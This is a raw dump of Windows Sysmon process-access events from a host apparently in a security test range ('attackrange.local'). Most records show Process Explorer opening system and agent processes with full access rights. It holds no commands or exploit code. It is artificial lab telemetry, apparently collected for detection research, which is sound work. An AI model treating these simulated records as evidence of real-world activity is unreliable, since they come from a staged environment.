15:17:00.079{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792148Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.079{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792147Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.079{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792146Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.079{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792402Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792401Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792400Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792399Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792398Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792397Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792396Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792395Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792394Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792393Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792392Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792391Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792390Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792389Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792388Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792387Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792386Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792385Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792384Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792383Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792382Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792381Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792380Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792379Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792378Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792377Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792376Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792375Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792374Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792373Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792372Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792371Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792370Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792369Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792368Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 